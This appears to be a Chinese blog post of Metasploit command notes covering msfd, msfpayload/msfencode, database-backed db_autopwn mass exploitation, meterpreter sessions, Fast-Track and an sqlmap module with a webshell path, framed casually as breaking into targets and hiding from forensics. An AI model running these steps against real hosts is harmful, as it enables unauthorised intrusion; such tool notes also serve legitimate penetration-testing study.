msf

0xx1 msfd interface
--------------

//msfd 是一个打开网络网络接口的工具,可以让一个或多个用户远程连接到msf安装机器上远程使用msf

例子

1.打开端口的命令

# msfd -a <msf安装机器IP>  -P <port>

2.查看是否打开端口

# netstat -tnl

3.远程连接MSF

# nc <ip> <port>

4.结束打开的端口

# kill -9 <端口进程ID>

----------------
0xx2  msfpayload && msfencode
-----------------
//msfpayload

该接口可以让我们修改现有的msfpayload

-S 显示具体星系

-C 用c语言搞它

-P  用perl语言搞它

-R  可以弄成RAW文件

//msfencode

可以直接访问payload编码器的框架

-l 列出可以用编码器

-h 帮助

例子

# msfpayload payload_name cmd=dir P  用Perl输出这个payload编码

# msfpayload -l  列出我们可以用的编码器

# msfpayload payload_name cmd=dir R | msfencode -b '0x00' -e 编码器名字 P

------------
0xx3   database backend commands //数据库后台命令
------------
支持sqlite3,mysql,postgresql.支持加载amap,nmap,nessus扫描报告自动测试


例子

msf > db_driver
[*]    Active Driver: sqlite3  默认的设置
[*]        Available: sqlite3  当前支持那些数据库

//如果你还要用其他几种数据库,按照下面的提示来操作吧
[*]     DB Support: Enable the mysql driver with the following command:
[*]                 $ gem install mysql
[*]     This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*]                 $ sudo apt-get install libmysqlclient-dev

[*]     DB Support: Enable the postgresql driver with the following command:
[*]                   * This requires libpq-dev and a build environment
[*]                 $ gem install pg

msf > db_driver mysql  //这个命令是把默认数据库修改为mysql


msf > db_create hcntex  //此命令是创建一个名字为Hcntex的SQLite3的数据库
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: hcntex
msf > help  //这是让数据库支持更多的命令展示在你的视线里

Database Backend Commands
=========================

Command               Description
-------               -----------
db_add_host           添加一个或者多个目标主机
db_add_note           添加注释
db_add_port           添加端口
db_autopwn            自动漏洞利用
db_connect            连接数据库
db_create             创建数据库
db_del_host           删除添加的目标
db_del_port           删除添加的端口
db_destroy            删除建立的数据库
db_disconnect         断开数据库连接
db_driver             匹配数据库驱动
db_hosts              列出你添加的全部目标主机
db_import             列出你添加的全部目标主机的端口
db_import_amap_mlog   导入一个AMAP的扫描文件(-o -M)
db_import_ip_list     导入一个你要测试的IP段
db_import_nessus_nbe  导入一个nessus的扫描结果(nbe)
db_import_nessus_xml  同上(xml)
db_import_nmap_xml    同上(xml)
db_import_qualys_xml  同上(xml)
db_nmap               执行nmap并记录输出        
db_notes              显示你在添加的注释
db_services           显示所有服务
db_vulns              列数数据库中的所有漏洞
db_workspace          转换工作区域

msf > db_disconnect      //这个命令是断开和你创建的数据库连接                                  
msf > db_connect hcntex  //再次连接到这个数据库[*] Successfully connected to the database
[*] File: hcntex
msf > db_destroy hcntex  //删除这个数据库
[*] Deleting hcntex...

数据库漏洞利用例子

msf > db_autopwn -h  //自动利用的参数
[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

msf >  db_connect hcntex       //连接到创建的数据库

msf >  help                    //查看是否连接成功。看是否有数据库后台操作命令判断

msf >  db_nmap -参数 攻击ip     //用namp扫描你的攻击目标。前提是你的电脑安装了Nmap <-参数是Nmap的扫描参数>

msf >  db_autopwn -p -e -b     //基于端口自动绑定攻击开始呗。具体参数参考db_autopwn -h

msf >  sessions -l             //列出已经被你日了的电脑会话

msf >  sessions -i <会话编号>  //连接你的这个会话

meterpreter> shell            //注意最前面哦。这就是打开门让你进去的东西喽
------------------
0xx4 Fast-Track autopwn             //快捷创建数据库攻击
------------------

渗透平台BT4

# cd /pentest/exploits/fasttrack/

# ./fast-track.py -c

# ./fast-track.py -c <参数> <目标IP> -r

---------------------
0xx5  Meterpreter payload        //隐藏自己。增加反取证的难度的东西呗
---------------------

# Meterpreter payload   可以参考 www.milsec.net 里面的embed a Metasploit Payload in any

executable 这个文章哦

 

-----------
0xx6  Auxiliary sqlmap && Fast-Track sqlpwnage //注入模块的东东
-----------

# locate sqlmap.py                            //获取sqlmap.py的路径

# ./msfconsole                                //启动那个啥呢?

msf>use auxiliary/scanner/http/sqlmap        //启动这扫描的东东

msf>show options                             //看穿内裤了没有的命令

msf>set RHOSTS <URL>                         //设置你要日的网站。URL=什么呢?

msf>set PATH shell.php                       //他们管这个叫webshell

msf>set QURTY id=999999                       //这个我不知道是啥。按照这个来就可以。知道的兄弟教教我!

msf>set sqlMAP_path <刚刚locat sqlmap.py的路径>   //设置的扫描模块的变量

msf>set THREADS 100                               //难道是设置传说中的线程?

msf>set OPTS '--dbs --current-user'               //实话是我没看懂。懂的前辈指点一下。谢谢

msf>exploit                                  //开始日喽。咱喝点咖啡在回来验收。中间的数据得自己留意哦!

--Fast-Track sqlpwnage  //这个例子和上面差不多。只是速度要快点

# locate fast-track.py

# cd 到fast-track.py目录下

# ./fast-track.py -i

# 接下来就看各位看客大叔们自己按照help表演喽

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值